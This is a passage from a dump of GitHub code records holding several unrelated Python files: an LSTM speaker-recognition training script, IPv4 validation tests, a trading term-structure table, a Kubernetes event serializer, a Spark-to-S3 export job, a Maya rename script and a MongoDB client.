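feats = np.arange(20).reshape(10, 2)          # 10 frames, 2 coefficients
print(windows(feats, width=4, hop=3).shape)   # (3, 4, 2)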
names_list = []\n\n num_files = len(f_list)\n print('Files to process: ', num_files)\n file_idx = 0\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n\n for line in f_list:\n path, label = line.rstrip().split(' ')\n path = path[:-4] + '.npy'\n path = join(dataset_dir, path)\n label = int(label) - 1 # in Voxceleb classes starts from 1, shift to 0\n\n timestep_samples = load_feature_from_file(path, num_timesteps)\n stretched_label = np.full(timestep_samples.shape[0], label)\n stretched_name = np.full(timestep_samples.shape[0], line)\n\n if timestep_samples.shape[0] != 0:\n features.extend(timestep_samples)\n labels.extend(stretched_label)\n names_list.extend(stretched_name)\n\n file_idx += 1\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n if debug_mode and file_idx == debug_break_number:\n print('\\nDebug mode. Interrupted on ', file_idx)\n break\n\n print('Dataset successfully processed and saved')\n time_end = datetime.datetime.now()\n print('Elapsed time: ', time_end-time_start)\n\n features = np.array(features)\n labels = np.array(labels)\n return features, labels, names_list\n\n\ndef load_cleared_audio(dataset_dir, files_list):\n print('Loading cleared audio files...')\n audio_all = []\n labels = []\n file_idx = 0\n num_files = len(files_list)\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n for line in files_list:\n path, label = line.rstrip().split(' ')\n path = path[:-4] + '.npy' # eliminate .wav and add .npy\n path_to_file = join(dataset_dir, path)\n audio = np.load(path_to_file)\n audio_all.append(audio)\n labels.append(int(label)-1) # in Voxceleb classes starts from 1, shift to 0\n file_idx += 1\n print_progress_bar(iteration=file_idx, total=num_files,\n prefix='{}/{}'.format(file_idx, num_files), suffix='complete')\n return np.array(audio_all), np.array(labels)\n\n\ndef feature_mixup_augmentation(features, labels, alpha, num_to_mix):\n print('Started data augmentation using feature mixup...')\n time_start = datetime.datetime.now()\n\n mixup_features = []\n mixup_labels = []\n num_records = len(labels)\n\n indices = np.arange(num_records)\n np.random.shuffle(indices)\n features = features[indices]\n labels = labels[indices]\n\n num_same_class = 0\n for idx in range(num_records-num_to_mix+1):\n for mix_idx in range(num_to_mix-1):\n lam = np.random.beta(a=alpha, b=alpha)\n mixed_feat = lam * features[idx] + (1-lam) * features[idx+mix_idx+1]\n mixed_lab = lam * labels[idx] + (1-lam) * labels[idx+mix_idx+1]\n mixup_features.append(mixed_feat)\n mixup_labels.append(mixed_lab)\n\n if np.array_equal(labels[idx], labels[idx+mix_idx+1]):\n num_same_class += 1\n\n print_progress_bar(idx, num_records-num_to_mix,\n prefix='{}/{}'.format(idx+1, num_records-num_to_mix+1),\n suffix='complete')\n\n ratio = num_same_class/(num_to_mix*num_records)\n print('%.2f%% are mixed from the same class,\\\n \\n%.2f%% are mixed from different classes' % (ratio, 1-ratio))\n\n time_end = datetime.datetime.now()\n print('Elapsed time: ', time_end-time_start)\n return np.array(mixup_features), np.array(mixup_labels)\n\n\ndef audio_mixup_augmentation(paths_list, cleared_audio_dir, alpha, num_classes, sample_rate,\n num_coeffs, num_timesteps, num_to_mix):\n print('Started data augmentation using audio mixup...')\n time_start = datetime.datetime.now()\n mixup_features = []\n mixup_labels = 
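feature_mixup_augmentation above is standard mixup: draw lam from Beta(alpha, alpha) and take the same convex combination of two samples' features and of their one-hot labels, x_mix = lam*x_i + (1-lam)*x_j. A minimal sketch of one mixed pair:

import numpy as np

rng = np.random.default_rng(0)

def mixup(x1, y1, x2, y2, alpha=5.0):
    lam = rng.beta(alpha, alpha)          # concentrates near 0.5 for large alpha
    return lam * x1 + (1 - lam) * x2, lam * y1 + (1 - lam) * y2

x, y = mixup(np.ones(3), np.array([1.0, 0.0]),
             np.zeros(3), np.array([0.0, 1.0]))
print(x, y)   # element-wise convex combination of both samples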
[]\n\n paths_list = list(dict.fromkeys(paths_list)) # remove all duplicates\n num_records = len(paths_list)\n np.random.shuffle(paths_list)\n audio, labels = load_cleared_audio(cleared_audio_dir, paths_list)\n labels = to_categorical(labels, num_classes)\n\n print('Augmentation:')\n num_same_class = 0\n for idx in range(num_records-num_to_mix+1):\n for mix_idx in range(num_to_mix-1):\n lam = np.random.beta(a=alpha, b=alpha)\n audio_size = len(audio[idx]) if len(audio[idx])= batch_size:\n labels = to_categorical(labels, num_classes)\n batch_index = 0\n yield (features[:batch_size], labels[:batch_size])\n #TODO: what if count of images is not divisible by batch_size?\n\n\ndef initialize_base_model(num_timesteps, num_coeffs, output_size):\n model = Sequential()\n\n model.add(CuDNNLSTM(256, return_sequences=True,\n input_shape=(num_timesteps, num_coeffs)))\n model.add(Dropout(0.2))\n\n model.add(CuDNNLSTM(128, return_sequences=True))\n model.add(Dropout(0.4))\n\n model.add(CuDNNLSTM(output_size, return_sequences=True))\n model.add(Dropout(0.5))\n\n return model\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(description=\"Performing training and testing of \\\n a neural network\")\n parser.add_argument('--dataset_dir', required=True, default='',\n help=\"Path of directory containing features of voice \\\n cleared audio dataset in .npy binary format\")\n parser.add_argument('--dataset_list_path', required=True, default='',\n help=\"Path to txt file containing relative path to all \\\n audio in dataset\")\n parser.add_argument('--property_file_loc', required=True, default='',\n help=\"Path to property file\")\n parser.add_argument('--num_timesteps', type=int, default=20,\n help=\"(Optional) Number of timesteps per audio sample \\\n (default is 5 for better training of CuDNNLSTM layers)\")\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_epochs', type=int, default=10)\n parser.add_argument('--num_folds', type=int, default=5,\n help=\"Number of folds to do K-Fold cross validation\")\n parser.add_argument('--num_runs', type=int, default=10,\n help=\"Number of times for cross validation run\")\n parser.add_argument('--gpus', type=int, default=1,\n help=\"Number of GPUs to use in training\")\n parser.add_argument('--use_audio_mixup', action='store_true',\n help=\"Whether to use mixup of input audio or not\")\n parser.add_argument('--use_feature_mixup', action='store_true',\n help=\"Whether to use mixup of audio features or not\")\n parser.add_argument('--cleared_audio_dir', default='',\n help=\"Path of directory containing silence cleared \\\n audion dataset in .npy binary format\")\n parser.add_argument('--debug_mode', action='store_true',\n help=\"Whether to interrupt loading of all files to \\\n increase debugging speed\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n #region Arguments reading\n args = parse_arguments()\n num_timesteps = args.num_timesteps\n batch_size = args.batch_size * args.gpus\n num_epochs = args.num_epochs\n num_gpus = args.gpus\n num_folds = args.num_folds\n num_runs = args.num_runs\n #endregion\n\n output_size_lstm = 64\n\n #region Property reading\n with open(args.property_file_loc, 'r') as prop_file:\n num_classes, num_coeffs = prop_file.readline().split(',')\n num_classes = int(num_classes)\n num_coeffs = int(num_coeffs)\n #endregion\n\n #region Data loading and preparation\n features, labels, names_list = load_voxceleb_features(dataset_dir=args.dataset_dir,\n list_path=args.dataset_list_path,\n 
num_timesteps=num_timesteps,\n debug_mode=args.debug_mode)\n names_list = np.array(names_list)\n #endregion\n\n #region Generators initializing\n # train_list, test_list, val_list = list_train_test_val_split(list_path=args.dataset_list_path,\n # num_classes=num_classes,\n # test_size=0.2, \n # val_size=0.1)\n # train_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=train_list,\n # subset='train',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n # test_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=test_list,\n # subset='test',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n # val_generator = arrays_generator(dataset_dir=args.dataset_dir,\n # subset_list=val_list,\n # subset='val',\n # num_timesteps=num_timesteps,\n # num_coeffs=num_coeffs,\n # num_classes=num_classes,\n # batch_size=batch_size)\n #endregion\n\n time_start = datetime.datetime.now() # time for training\n\n # define k-fold cross validation test harness\n kfold = RepeatedStratifiedKFold(n_splits=num_folds, n_repeats=num_runs)\n acc_scores = []\n run_idx = 1\n fold_idx = 1\n\n for train, test in kfold.split(features, labels):\n fold_time_start = datetime.datetime.now()\n print('--------------- Run {}: fold {} ---------------'.format(run_idx, fold_idx))\n if fold_idx == num_folds:\n fold_idx = 0\n run_idx += 1\n fold_idx += 1\n\n #region Model initializing\n if num_gpus <= 1:\n base_model = initialize_base_model(num_timesteps, num_coeffs, output_size_lstm)\n x = base_model.output\n # reshape 3D output of LSTM to 2D form\n x = Reshape((num_timesteps*output_size_lstm,))(x)\n predictions = Dense(num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n else:\n with tf.device(\"/cpu:0\"):\n base_model = initialize_base_model(num_timesteps, num_coeffs, output_size_lstm)\n x = base_model.output\n # reshape 3D output of LSTM to 2D form\n x = Reshape((num_timesteps*output_size_lstm,))(x)\n predictions = Dense(num_classes, activation='softmax')(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n model = multi_gpu_model(model, gpus=num_gpus)\n #endregion\n\n opt = keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999,\n epsilon=None, decay=0.0, amsgrad=False)\n loss = 'categorical_crossentropy'\n\n model.compile(loss=loss,\n optimizer=opt,\n metrics=['accuracy'])\n\n es = EarlyStopping(monitor='acc', patience=10, verbose=1, restore_best_weights=True)\n\n onehot_labels = to_categorical(labels, num_classes)\n\n x_train = features[train]\n y_train = onehot_labels[train]\n\n if args.use_feature_mixup:\n mixup_features, mixup_labels = feature_mixup_augmentation(x_train, y_train,\n alpha=5,\n num_to_mix=2)\n x_train = np.concatenate((x_train, mixup_features), axis=0)\n y_train = np.concatenate((y_train, mixup_labels), axis=0)\n\n if args.use_audio_mixup:\n mixup_features, mixup_labels = audio_mixup_augmentation(paths_list=names_list[train],\n cleared_audio_dir=args.cleared_audio_dir,\n alpha=1000,\n num_classes=num_classes,\n sample_rate=16000,\n num_coeffs=40,\n num_timesteps=25,\n num_to_mix=2) #TODO: eliminate consts\n x_train = np.concatenate((x_train, mixup_features), axis=0)\n y_train = np.concatenate((y_train, mixup_labels), axis=0)\n\n #region Model.fit\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=num_epochs,\n verbose=1,\n shuffle=True,\n callbacks=[es])\n 
#endregion\n\n #region Model.fit_generator\n # num_train_samples = len(train_list)\n # train_gen_len = num_train_samples // batch_size\n # num_val_samples = len(val_list)\n # val_gen_len = num_val_samples // batch_size\n # model.fit_generator(generator=train_generator,\n # steps_per_epoch=train_gen_len,\n # epochs=num_epochs,\n # verbose=1,\n # validation_data=val_generator,\n # validation_steps=val_gen_len,\n # shuffle=True)\n #endregion\n\n print('\\nModel evaluation...')\n\n print('Start preparing test data...')\n x_test, y_test = audio_mixup_augmentation(paths_list=names_list[test],\n cleared_audio_dir=args.cleared_audio_dir,\n alpha=1000,\n num_classes=num_classes,\n sample_rate=16000,\n num_coeffs=40,\n num_timesteps=25,\n num_to_mix=2) #TODO: eliminate consts\n\n #region Model.evaluate\n loss_and_metrics = model.evaluate(x_test, y_test,\n batch_size=batch_size,\n verbose=1)\n #endregion\n\n #region Model.evaluate_generator\n # num_test_samples = len(test_list)\n # test_gen_len = num_test_samples // batch_size\n # loss_and_metrics = model.evaluate_generator(generator=test_generator,\n # steps=test_gen_len,\n # verbose=1)\n #endregion\n\n print(\"%s: %.5f\\n%s: %.2f%%\" % (model.metrics_names[0], loss_and_metrics[0],\n model.metrics_names[1], (loss_and_metrics[1]*100)))\n acc_scores.append(loss_and_metrics[1] * 100)\n\n fold_time_end = datetime.datetime.now()\n print('Elapsed time: ', fold_time_end-fold_time_start)\n\n #region Model saving\n model_name = 'model_000{}_{}_folds'.format(fold_idx-1, num_folds)\n save_loc = './models/' + model_name #TODO: will not work on Windows\n if not isdir(save_loc):\n makedirs(save_loc)\n model.save(join(save_loc, (model_name+'.h5')))\n print('Model saved in root directory of project in ', save_loc)\n\n with open(join(save_loc, 'train_list.txt'), 'w') as lst:\n for line in names_list[train]:\n lst.write(line)\n with open(join(save_loc, 'test_list.txt'), 'w') as lst:\n for line in names_list[test]:\n lst.write(line)\n #endregion\n\n print('Average accuracy: %.2f%% (+/- %.2f%%)' % (np.mean(acc_scores), np.std(acc_scores)))\n\n time_end = datetime.datetime.now()\n print('Elapsed time for the whole process: ', time_end-time_start)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nikitashvarts/CocktailPartySpeakerRecognition","sub_path":"model_train_test.py","file_name":"model_train_test.py","file_ext":"py","file_size_in_byte":22497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"24051941988","text":"import ipaddress\nimport unittest\nfrom net_min import is_valid_ipv4, min_network\n\n\nclass TestMethods(unittest.TestCase):\n\n valid_ipv4_addresses = [\n '192.168.1.100',\n '10.0.0.1',\n '213.151.0.8',\n '77.77.77.77'\n ]\n\n invalid_ipv4_addresses = [\n '666.1.2.2',\n '256.256.256.256',\n '0.567.567.567',\n '192.168.0.257'\n ]\n\n def test_is_invalid_ip_addresses(self):\n\n for address in self.invalid_ipv4_addresses:\n status = is_valid_ipv4(address)\n self.assertFalse(status)\n\n def test_is_valid_ip_addresses(self):\n for address in self.valid_ipv4_addresses:\n status = is_valid_ipv4(address)\n self.assertTrue(status)\n\n def test_find_min_network(self):\n ip_list = ['192.168.0.0', '192.168.2.245', '192.168.255.255']\n self.assertEqual(min_network(ip_list),\n ipaddress.IPv4Network('192.168.0.0/16'))\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"kirolga/net_min","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6754636654","text":"import sys\nr = lambda: sys.stdin.readline().strip()\nif __name__ == '__main__':\n\tn = int(r())\n\tarr = [int(r()) for _ in range(n)]\n\n\tmemo = [[0]*2 for _ in range(n+1)]\n\tmemo[1][0]=arr[0]\n\tif(n==1):\n\t\tprint(arr[0])\n\telse:\n\t\tmemo[2][0]=arr[1]\n\t\tmemo[2][1]=arr[1]+memo[1][0]\n\t\tfor i in range(3,n+1):\n\t\t\tmemo[i][0] = max(memo[i-2][0],memo[i-2][1],memo[i-3][1]) + arr[i-1]\n\t\t\tmemo[i][1] = memo[i-1][0] + arr[i-1]\n\t\tprint(max(memo[n][0],memo[n][1],memo[n-1][1]))","repo_name":"trevor91/algorithm","sub_path":"beakjoon/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9087654759","text":"from sys import argv, path\n\npath.append(\".\")\n\nfrom util.contract_settings import get_settings\nfrom util.parsers import tas_rec\nfrom util.rec_tools import get_precision\nfrom util.term_structure import get_terms\n\n\n# python charts/term_chg_table.py NGM23 2023-03-27T00:00:00 2023-03-28T00:00:00 0\n\n# NGJ23 starting symbol\n# 12 12 consecutive terms, starting at J23\n# \"2023-03-22T06:00:00.000000\" start ts\n# \"2023-03-22T07:00:00.000000\" end ts\n# 1 print tas records\n\n\nMONTHS = [ \"F\", \"G\", \"H\", \"J\", \"K\", \"M\", \"N\", \"Q\", \"U\", \"V\", \"X\", \"Z\"]\nFMT = \"%Y-%m-%dT%H:%M:%S.%f\"\nFIELD_WIDTH = 10\n\n\ndef process_records(\n recs,\n contract_id,\n precision,\n print_recs\n):\n\n if print_recs:\n\n print(f\"{contract_id}\\n\")\n\n\n start_price = recs[0][tas_rec.price]\n end_price = recs[-1][tas_rec.price]\n count = 0\n at_bid = 0\n at_ask = 0\n\n for rec in recs:\n\n price = f\"{rec[tas_rec.price]: {FIELD_WIDTH}.{precision}f}\"\n qty = f\"{rec[tas_rec.qty]: {FIELD_WIDTH}d}\"\n side = None\n\n if rec[tas_rec.side] == 0:\n\n at_bid += 1\n side = \"bid\".rjust(FIELD_WIDTH)\n \n else:\n\n at_ask += 1\n side = \"ask\".rjust(FIELD_WIDTH)\n\n count += 1\n\n if print_recs:\n\n print(rec[tas_rec.timestamp].ljust(20), price, qty, side)\n\n if print_recs:\n \n print(\"\\n\")\n\n return ( contract_id, start_price, end_price, count, at_bid, at_ask )\n\n\nif __name__ == \"__main__\":\n\n init_symbol = argv[1]\n multiplier, _ = get_settings(init_symbol)\n precision = get_precision(float(multiplier))\n multiplier = float(multiplier)\n n_months = int(argv[2])\n start = argv[3]\n end = argv[4]\n print_recs = int(argv[5])\n \n terms = get_terms(\n init_symbol,\n multiplier,\n n_months,\n FMT,\n start,\n end\n )\n \n results = []\n\n for contract_id, recs in terms.items():\n\n results.append(\n process_records(\n recs,\n contract_id,\n precision,\n print_recs\n )\n )\n\n print(start, \"\\t\", end, \"\\n\")\n\n print(\n \"contract_id\".ljust(FIELD_WIDTH),\n \"chg\".ljust(FIELD_WIDTH),\n \"chg %\".ljust(FIELD_WIDTH),\n \"count\".ljust(FIELD_WIDTH),\n \"at_bid\".ljust(FIELD_WIDTH),\n \"at_ask\".ljust(FIELD_WIDTH),\n \"delta\".ljust(FIELD_WIDTH),\n \"delta_pct\"\n \"\\n\"\n )\n\n for res in results:\n\n contract_id, start_price, end_price, count, at_bid, at_ask = res\n \n chg = f\"{end_price - start_price: 0.{precision}f}\"\n chg_pct = f\"{((end_price / start_price - 1) * 100): 0.2f}%\"\n delta = -at_bid + at_ask\n delta_pct = None\n\n try:\n \n delta_pct = f\"{delta / count * 100: 
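The tests.py record above expects min_network(['192.168.0.0', '192.168.2.245', '192.168.255.255']) to return 192.168.0.0/16, i.e. the smallest network containing every address. The implementation itself is not in this slice; a hedged reconstruction of what such a function might do with the ipaddress module:

import ipaddress

def min_network(addrs):
    nets = [ipaddress.ip_network(a) for a in addrs]
    candidate = nets[0]
    # Widen one bit at a time until every address fits.
    while not all(n.subnet_of(candidate) for n in nets):
        candidate = candidate.supernet()
    return candidate

print(min_network(['192.168.0.0', '192.168.2.245', '192.168.255.255']))
# 192.168.0.0/16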
0.2f}%\" \n \n except:\n\n # divide by zero\n\n pass\n\n print(\n contract_id.ljust(FIELD_WIDTH),\n chg.ljust(FIELD_WIDTH),\n chg_pct.ljust(FIELD_WIDTH),\n str(count).ljust(FIELD_WIDTH),\n str(at_bid).ljust(FIELD_WIDTH),\n str(at_ask).ljust(FIELD_WIDTH),\n str(delta).ljust(FIELD_WIDTH),\n delta_pct.ljust(FIELD_WIDTH)\n )","repo_name":"toobrien/intraday","sub_path":"charts/term_chg_table.py","file_name":"term_chg_table.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74306365880","text":"import six\r\n\r\nfrom repository.common.type import Kubernetes, Metric, NetStat, Common\r\n# from repository.model.common.delete import DeleteModel\r\nfrom repository.model.k8s.daemonset import DaemonSet\r\nfrom repository.model.k8s.deployment import Deployment\r\nfrom repository.model.k8s.namespace import Namespace\r\nfrom repository.model.k8s.node import Node\r\nfrom repository.model.k8s.pod import Pod\r\nfrom repository.model.k8s.service import Service\r\nfrom repository.model.metric.endpoint import EndpointNetworkMetric\r\nfrom repository.model.metric.multi_cluster import MultiClusterMetric\r\nfrom repository.model.metric.node import NodeMetric\r\nfrom repository.model.netstat.multi_cluster import MultiClusterNetwork\r\nfrom repository.model.netstat.service import MultiClusterService, ServiceExport, ServiceImport\r\n\r\n\r\nclass EventObject:\r\n \"\"\"\r\n class for event transfer object\r\n \"\"\"\r\n\r\n fields = {\r\n 'event_type': 'str',\r\n 'object_type': 'str',\r\n 'object_value': 'object',\r\n }\r\n\r\n event_type = None\r\n object_type = None\r\n object_value = None\r\n\r\n def __init__(self, event_type, object_type, object_value):\r\n \"\"\"\r\n EventObject()\r\n :param event_type:\r\n (str) a Enum in class cluster.common.type.Event(Enum)\r\n :param object_type:\r\n (str) class(Enum)'s value in class cluster.repository.common.type\r\n :param object_value:\r\n \"\"\"\r\n self.event_type = event_type\r\n self.object_type = object_type\r\n self.object_value = object_value\r\n\r\n def to_dict(self):\r\n \"\"\"Returns the model properties as a dict\"\"\"\r\n result = {}\r\n\r\n for attr, _ in six.iteritems(self.fields):\r\n value = getattr(self, attr)\r\n if isinstance(value, list):\r\n result[attr] = list(map(\r\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\r\n value\r\n ))\r\n elif hasattr(value, \"to_dict\"):\r\n result[attr] = value.to_dict()\r\n elif isinstance(value, dict):\r\n result[attr] = dict(map(\r\n lambda item: (item[0], item[1].to_dict())\r\n if hasattr(item[1], \"to_dict\") else item,\r\n value.items()\r\n ))\r\n else:\r\n result[attr] = value\r\n return result\r\n\r\n @classmethod\r\n def to_object(cls, _dict):\r\n # todo: test\r\n # check repository.common.type.Kubernetes(Enum)\r\n if _dict['object_type'] == Kubernetes.NODE.value:\r\n obj = Node.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.POD.value:\r\n obj = Pod.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.NAMESPACE.value:\r\n obj = Namespace.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.DEPLOYMENT.value:\r\n obj = Deployment.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.DAEMONSET.value:\r\n obj = DaemonSet.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Kubernetes.NAMESPACE.value:\r\n obj = Namespace.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == 
Kubernetes.SERVICE.value:\r\n obj = Service.to_object(_dict['object_value'])\r\n\r\n # check repository.common.type.Metric(Enum)\r\n elif _dict['object_type'] == Metric.NODE_METRIC.value:\r\n obj = NodeMetric.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Metric.MULTI_CLUSTER_METRIC.value:\r\n obj = MultiClusterMetric.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.MULTI_CLUSTER_NETWORK.value:\r\n obj = MultiClusterNetwork.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.MULTI_CLUSTER_SERVICE.value:\r\n obj = MultiClusterService.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.SERVICE_EXPORT.value:\r\n obj = ServiceExport.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == NetStat.SERVICE_IMPORT.value:\r\n obj = ServiceImport.to_object(_dict['object_value'])\r\n elif _dict['object_type'] == Metric.ENDPOINT_NETWORK_METRIC.value:\r\n obj = EndpointNetworkMetric.to_object(_dict['object_value'])\r\n\r\n else:\r\n raise TypeError('Invalid value. Not defined in cluster.repository.model.common.type')\r\n\r\n return EventObject(event_type=_dict['event_type'],\r\n object_type=_dict['object_type'],\r\n object_value=obj)\r\n","repo_name":"krunivs/gw_agent","sub_path":"cluster/event/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2619547217","text":"\"\"\"alfredyang@pharbers.com.\n\nThis is job template for Pharbers Max Job\n\"\"\"\n\nfrom phcli.ph_logs.ph_logs import phs3logger, LOG_DEBUG_LEVEL\n\n\ndef execute(**kwargs):\n logger = phs3logger(kwargs[\"run_id\"], LOG_DEBUG_LEVEL)\n spark = kwargs['spark']\n\n data_frame = kwargs['df_input']\n dataType = kwargs['dataType']\n tempArgs = kwargs['tempArgs']\n glueArgs = kwargs['glueArgs']\n out_path = kwargs['out_path']\n out_encoding = kwargs['out_encoding']\n out_filenum = kwargs['out_filenum']\n\n # 输入参数\n '''\n {\n \"dataType\": \"temp/glue\",\n \"tempArgs\": {\n \"projectName\": \"autorawdata\",\n \"table\": \"union_raw_data\",\n \"version\": [\"autorawdata_autorawdata_developer_2022-07-25T09:40:23+00:00_李宇轩\"]\n },\n \"glueArgs\": {\n \"table\": \"mkt_mapping\",\n \"version\": [\"奥鸿_20210623\"]\n },\n \"out_path\": \"s3://ph-max-auto/v0.0.1-2020-06-08/data_download/union_raw_data.csv\",\n \"out_encoding\":\"utf-8/GBK\",\n \"out_filenum\":\"1\"\n }\n '''\n\n\n import os\n import pandas as pd\n from pyspark.sql.types import StringType, IntegerType, DoubleType, StructType, StructField\n from pyspark.sql import functions as func \n import json\n import boto3\n from pyspark.sql.functions import lit, col, struct, to_json, json_tuple\n from functools import reduce\n\n\n def convert_union_schema(df):\n # 对多TraceId取Schema的col的并集\n rows = df.select(\"schema\").distinct().collect()\n return list(reduce(lambda pre, next: set(pre).union(set(next)), list(map(lambda row: [schema[\"name\"] for schema in json.loads(row[\"schema\"])], rows)) ))\n\n def convert_normal_df(df, cols):\n # 将统一Schema的DF转成正常的DataFrame\n return df.select(json_tuple(col(\"data\"), *cols)) \\\n .toDF(*cols)\n\n def getTempData(projectName, table, version):\n # 读取中间文件数据\n projectId={\"autorawdata\":\"99a5R2kIMyInYEc\", \"automax\":\"s7nBDbpqfUShq1w\", \"autoweight\":\"xu68bxmMFJo6-o9\", \"autorffactor2\":\"2LWyqFPIIwCSZEV\", \"cmax\":\"ZyQpzttbwmvQcCf\"}\n projectPath=f\"s3://ph-platform/2020-11-11/lake/pharbers/{projectId[projectName]}/{table}\"\n 
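EventObject.to_object in the object.py record above dispatches on the object_type string through a long if/elif chain over the repository's model classes. A minimal sketch of the registry alternative (the class name here is an illustrative placeholder, not one of the repository's models):

DESERIALIZERS = {}

def register(tag):
    def wrap(cls):
        DESERIALIZERS[tag] = cls
        return cls
    return wrap

@register('Node')
class Node:
    @classmethod
    def to_object(cls, d):
        return cls()

def to_object(tag, payload):
    try:
        return DESERIALIZERS[tag].to_object(payload)
    except KeyError:
        raise TypeError('Invalid value. Not a registered object_type: %r' % tag)

print(to_object('Node', {}))   # <__main__.Node object at ...>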
print(projectPath)\n df = spark.read.parquet(projectPath) \\\n .where(col('traceId').isin(version))\n dfout = convert_normal_df(df, convert_union_schema(df))\n if dfout.count() == 0:\n raise ValueError(\"data is empty\")\n return dfout\n\n def getGlueData(table, version):\n projectId=\"zudIcG_17yj8CEUoCTHg\"\n data_path=f\"s3://ph-platform/2020-11-11/lake/pharbers/{projectId}/{table}\"\n df = spark.read.parquet(data_path).where(col('version').isin(version))\n if df.count() == 0:\n raise ValueError(\"data is empty\")\n return df\n\n def writeToS3(df, out_path, out_encoding, out_filenum, out_mode=\"append\"):\n # Write out to S3 \n df.repartition(int(out_filenum)) \\\n .write.format(\"csv\").option(\"header\", \"true\").option(\"encoding\", str(out_encoding)) \\\n .mode(out_mode).save(out_path)\n\n # ======== Execute ======\n # Read data\n if dataType == 'temp':\n dfout = getTempData(tempArgs['projectName'], tempArgs['table'], tempArgs['version'])\n elif dataType == 'glue':\n dfout = getGlueData(glueArgs['table'], glueArgs['version'])\n\n dfout.show(2)\n # Write out to S3\n writeToS3(dfout, out_path, out_encoding, out_filenum)\n \n return {\"out_df\": data_frame}\n","repo_name":"PharbersDeveloper/bpmaxdag","sub_path":"phjobs/downloadtos3.py","file_name":"downloadtos3.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7020077873","text":"\"\"\"\r\nLists all children and renames them.\r\n\r\nAuthor: www.LouisRossouw.com\r\n\"\"\"\r\n\r\n\r\n\r\nimport maya.cmds as cmds\r\n\r\n\r\nNEW_NAME = \"machine_geo_\" # add new name here.\r\n\r\nselection = cmds.ls(selection=True)\r\nselection_children = cmds.listRelatives(selection, ad=True)\r\n\r\ncount = 0\r\nfor child in selection_children:\r\n\tcount += 1\r\n\tprint(child)\r\n\tcmds.rename(child, NEW_NAME+ str(count))\r\n \r\n \r\n","repo_name":"LouisRossouw/Maya-tools","sub_path":"scripts/rename_all_children.py","file_name":"rename_all_children.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9502304808","text":"import logging\nimport os\nimport pymongo\nimport time\n\nMONGO_HOST = os.getenv(\"MONGO_HOST\", \"127.0.0.1\")\nMONGO_USERNAME= os.getenv(\"MONGO_USERNAME\", \"admin\")\nMONGO_PASSWORD= os.getenv(\"MONGO_PASSWORD\", \"admin\")\nMONGO_DB_NAME= os.getenv(\"MONGO_DB_NAME\", \"lomo\")\nMONGO_PORT= os.getenv(\"MONGO_PORT\", \"27017\")\n\nclass MongoClient:\n def __init__(self):\n self._mongo_client = pymongo.MongoClient('mongodb://%s:%s@%s:%s' % (MONGO_USERNAME, MONGO_PASSWORD, MONGO_HOST, MONGO_PORT))\n self._db = self._mongo_client[MONGO_DB_NAME]\n logging.basicConfig(level=logging.INFO)\n self._deviceuser_collection = self._db[\"devicesusers\"]\n self._user_collection = self._db[\"users\"]\n \n def get_device_user_token(self, id, token):\n return self._deviceuser_collection.find_one({'_id': id, 'token': token})\n \n def get_device_user(self, id):\n return self._deviceuser_collection.find_one({'_id': id})\n\n def get_user_device(self, id, token):\n device_user = self._deviceuser_collection.find_one({'_id': id, 'token': token})\n if device_user is not None:\n user = self.get_user(device_user[\"userId\"])\n for device in user[\"devices\"]:\n if device['id'] == id:\n return (user, device)\n return (None, None)\n\n def get_device(self, user_id, device_id):\n user = self.get_user(user_id)\n for device in user[\"devices\"]:\n if device['id'] == device_id:\n return device\n return None\n\n 
